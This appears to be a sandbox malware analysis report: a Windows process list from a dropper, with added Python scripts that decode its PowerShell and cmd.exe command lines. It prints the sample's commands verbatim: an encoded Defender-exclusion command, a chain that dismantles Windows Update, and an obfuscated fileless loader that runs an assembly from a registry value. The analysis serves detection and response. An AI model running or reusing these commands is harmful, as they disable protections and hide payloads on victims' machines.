C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe

"C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA=="
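
The -EncodedCommand argument above is base64 over UTF-16LE text, and the sample pads the decoded script with junk block comments (<#...#>) between tokens. The following is an added analyst example, not output from the sandbox or code from the sample: it decodes the string exactly as listed in this process entry, strips the comment padding, and reports which Defender exclusion the one-liner adds. The Add-MpPreference/Set-MpPreference list and the regex for -ExclusionPath are this example's own heuristics, not anything the report defines.

```python
import base64
import re

# The -EncodedCommand argument exactly as it appears in the process list
# above (copied from the report, not constructed).
ENCODED_COMMAND = (
    "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA=="
)

# Cmdlets that weaken Defender when they show up in a decoded command
# (heuristic chosen for this example).
DEFENDER_TAMPER_CMDLETS = ("Add-MpPreference", "Set-MpPreference")


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE text, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Remove the <# ... #> comments the sample inserts as junk between
    tokens, then collapse the whitespace they leave behind."""
    no_comments = re.sub(r"<#.*?#>", " ", script, flags=re.S)
    return " ".join(no_comments.split())


def defender_exclusions(script: str) -> dict:
    """Report whether the script tampers with Defender and which paths it
    excludes. Paths are returned as written; $env: variables are not
    expanded because they resolve on the victim at run time."""
    tampers = any(c.lower() in script.lower() for c in DEFENDER_TAMPER_CMDLETS)
    paths = []
    m = re.search(r"-ExclusionPath\s+@?\(?([^)]*)\)?", script, flags=re.I)
    if m:
        paths = [p.strip().strip("'\"") for p in m.group(1).split(",") if p.strip()]
    return {
        "defender_tamper": tampers,
        "exclusion_paths": paths,
        "forced": bool(re.search(r"\s-Force\b", script, flags=re.I)),
    }


def analyse(b64: str) -> dict:
    """Decode, clean and classify one -EncodedCommand value."""
    cleaned = strip_block_comments(decode_encoded_command(b64))
    result = defender_exclusions(cleaned)
    result["command"] = cleaned
    return result


if __name__ == "__main__":
    for key, value in analyse(ENCODED_COMMAND).items():
        print(f"{key}: {value}")
```

Decoded, the command excludes the whole user profile and the whole system drive from Defender scanning with -Force, which is why the later updater.exe drop under the user profile and the dialer.exe injection hosts go unscanned. The same encoded string is passed to the second powershell.exe instance further down the process list.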

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
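
The cmd.exe chain above disables Windows Update in five ways at once: it stops the update services, deletes their service keys, takes ownership of WaaSMedicSvc.dll and grants Everyone (S-1-1-0) full control before renaming it, writes WindowsUpdate\AU policy values, and disables the update scheduled tasks. Note that rename is a cmd.exe internal command, so it produces no child process, which is why takeown and icacls appear in the process list below but no rename step does. The following is an added analyst example, not sandbox output or sample code: it splits the chain on the unconditional "&" separator, buckets each step by the technique this report flags, and counts how many external child processes cmd.exe should have spawned so the result can be checked against the process tree. The builtin list and the bucket names are this example's own choices.

```python
import re

# cmd.exe command line exactly as listed in the process list above (taken
# from the report, not constructed). cmd.exe runs the pieces separated by a
# single "&" in order, whether or not the previous piece succeeded.
CMD_LINE = (
    r'"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & '
    r'sc stop bits & sc stop dosvc & '
    r'reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & '
    r'reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & '
    r'reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & '
    r'reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & '
    r'reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & '
    r'takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & '
    r'icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & '
    r'rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & '
    r'reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & '
    r'reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & '
    r'reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & '
    r'reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & '
    r'SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE'
)

# Internal cmd.exe commands: they run inside cmd.exe itself and never appear
# as a child process, unlike sc/reg/takeown/icacls/schtasks.
CMD_BUILTINS = {"rename", "ren", "del", "copy", "move", "echo", "set", "type", "md", "rd"}


def split_chain(cmdline: str) -> list:
    """Return the individual commands that cmd.exe /c executes."""
    body = re.sub(r'^"[^"]*cmd\.exe"\s+/c\s+', "", cmdline, flags=re.I)
    return [c.strip() for c in re.split(r"\s&\s", body) if c.strip()]


def summarize(cmdline: str) -> dict:
    """Group the chain into the techniques this report flags: service stops,
    service key deletion, ACL tampering, Windows Update policy and task
    disabling. Targets are kept exactly as written (%SystemRoot% unexpanded)."""
    out = {"stopped_services": [], "deleted_service_keys": [], "policy_values": {},
           "acl_tamper": [], "everyone_full_control": False, "disabled_tasks": [],
           "builtin_steps": [], "other": []}
    for cmd in split_chain(cmdline):
        toks = cmd.split()
        tool, args = toks[0].lower(), toks[1:]
        if tool == "sc" and args[0].lower() == "stop":
            out["stopped_services"].append(args[1])
        elif tool == "reg" and args[0].lower() == "delete":
            out["deleted_service_keys"].append(args[1])
        elif tool == "reg" and args[0].lower() == "add":
            m = re.search(r"/v\s+(\S+)\s+/d\s+(\S+)", cmd, flags=re.I)
            out["policy_values"][m.group(1)] = m.group(2)
        elif tool == "takeown":
            out["acl_tamper"].append(("takeown", args[1]))
        elif tool == "icacls":
            out["acl_tamper"].append(("icacls", args[0]))
            # S-1-1-0 is the well-known SID for Everyone; :F grants full control.
            out["everyone_full_control"] |= "S-1-1-0:F" in cmd
        elif tool == "schtasks":
            m = re.search(r'/TN\s+"([^"]+)"', cmd, flags=re.I)
            out["disabled_tasks"].append(m.group(1))
        elif tool in CMD_BUILTINS:
            out["builtin_steps"].append(cmd)
        else:
            out["other"].append(cmd)
    return out


def child_process_count(cmdline: str) -> int:
    """How many separate child processes cmd.exe should spawn for this chain;
    compare with the sc/reg/takeown/icacls/schtasks children in the process tree."""
    return sum(1 for c in split_chain(cmdline) if c.split()[0].lower() not in CMD_BUILTINS)


if __name__ == "__main__":
    for key, value in summarize(CMD_LINE).items():
        print(f"{key}: {value}")
    print("external child processes expected:", child_process_count(CMD_LINE))
```

Of the 24 steps, 23 should appear as children of this cmd.exe instance; the one that does not is the rename. Deleting the Services keys, not merely stopping the services, is what makes the change survive a reboot, and renaming WaaSMedicSvc.dll removes the component that would otherwise repair the update stack.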

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "..."

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
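
The two powershell.EXE command lines above (one 32-bit, one 64-bit) are the same one-liner obfuscated with the PowerShell -f format operator, string concatenation, backtick-split member names and ${} variable braces; the inner double quotes are backslash-escaped because this is the raw argument string. The following is an added analyst example, not sandbox output or code from the sample: it resolves those constructs textually, without running PowerShell, and then pulls out where the payload lives. It handles only the constructs present in this sample and assumes, as the sample itself relies on, that a backtick before a capital letter is a no-op rather than an escape sequence.

```python
import re

# Command line of the powershell.EXE child exactly as listed above (taken from
# the report, not constructed).
CMDLINE = r'''".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"'''

# ("{1}{0}" -f 'b','a')  ->  the format slots filled from the argument list
FORMAT_OP = re.compile(r"""\(\s*"((?:\{\d+\})+)"\s*-[fF]\s*('[^']*'(?:\s*,\s*'[^']*')*)\s*\)""")
# ("a"+"b"+"c")  ->  plain concatenation of string literals
CONCAT = re.compile(r'\(\s*("[^"]*"(?:\s*\+\s*"[^"]*")+)\s*\)')


def resolve_format(m: re.Match) -> str:
    slots = re.findall(r"\{(\d+)\}", m.group(1))
    args = re.findall(r"'([^']*)'", m.group(2))
    return "('" + "".join(args[int(i)] for i in slots) + "')"


def resolve_concat(m: re.Match) -> str:
    return "('" + "".join(re.findall(r'"([^"]*)"', m.group(1))) + "')"


def deobfuscate(cmdline: str) -> str:
    """Rewrite the obfuscated one-liner into readable PowerShell. Purely
    textual: nothing is executed."""
    s = cmdline.strip()
    if s.startswith('"') and s.endswith('"'):
        s = s[1:-1]
    s = s.replace('\\"', '"')                     # undo command-line escaping
    # Backticks that do not start a real escape (`n, `t, `0, ...) are no-ops;
    # PowerShell's escape letters are lowercase, so `V, `U, `A etc. vanish.
    s = re.sub(r"`(?![0abefnrtuv])", "", s)
    s = FORMAT_OP.sub(resolve_format, s)           # -f reassembly -> ('literal')
    s = CONCAT.sub(resolve_concat, s)              # "a"+"b" -> ('ab')
    s = re.sub(r"::\('([^']*)'\)", r"::\1", s)     # $t::('Load') -> $t::Load
    s = re.sub(r'::"(\w+)"', r"::\1", s)           # ::"lOcALMAChine" -> ::lOcALMAChine
    s = re.sub(r'\.\s*"(\w+)"', r".\1", s)         # ."VAluE" -> .VAluE
    s = re.sub(r"(?<=[\w\"\)\]])\.\('([^']*)'\)", r".\1", s)  # x.('m') -> x.m
    s = re.sub(r"\.\('([^']*)'\)", r"\1", s)       # .('cmd') -> cmd (call operator)
    s = re.sub(r"\(('[^']*')\)", r"\1", s)         # ('lit') -> 'lit'
    s = re.sub(r"\$\{(\w+)\}", r"$\1", s)          # ${nUll} -> $nUll
    s = re.sub(r"\$null\b", "$null", s, flags=re.I)
    s = re.sub(r"\s+", " ", s)
    s = re.sub(r"\(\s+", "(", s)
    s = re.sub(r"\s+\)", ")", s)
    s = re.sub(r"\s+;", ";", s)
    return s.strip()


def summarize_loader(script: str) -> dict:
    """Extract what the cleaned one-liner does: where the payload bytes are
    read from and how they are executed."""
    low = script.lower()
    hive = "HKLM" if "::localmachine" in low else ("HKCU" if "::currentuser" in low else None)
    sub = re.search(r"opensubkey\.invoke\('([^']*)'\)", script, flags=re.I)
    val = re.search(r"getvalue\.invoke\('([^']*)'\)", script, flags=re.I)
    return {
        "hive": hive,
        "subkey": sub.group(1) if sub else None,
        "value": val.group(1) if val else None,
        "assembly_load": "reflection.assembly" in low and "::load.invoke" in low,
        "runs_entrypoint": ".entrypoint.invoke" in low,
    }


if __name__ == "__main__":
    clean = deobfuscate(CMDLINE)
    print(clean)
    print(summarize_loader(clean))
```

Cleaned up, the one-liner reads the bytes stored in the registry value HKLM\SOFTWARE\dialerstager, hands them to [System.Reflection.Assembly]::Load, and invokes the assembly's entry point. The payload therefore never touches disk as a file, which fits the dllhost.exe and dialer.exe process-injection signatures above and means the registry value, not a dropped binary, is the artifact to collect and to hunt for on other hosts.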

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{bd4004b7-63cf-4e98-a503-e65cb84c6a03}

C:\Users\Admin\Google\Chrome\updater.exe

C:\Users\Admin\Google\Chrome\updater.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA=="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{630beb12-96aa-45ac-9ed5-6c5094036cc2}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

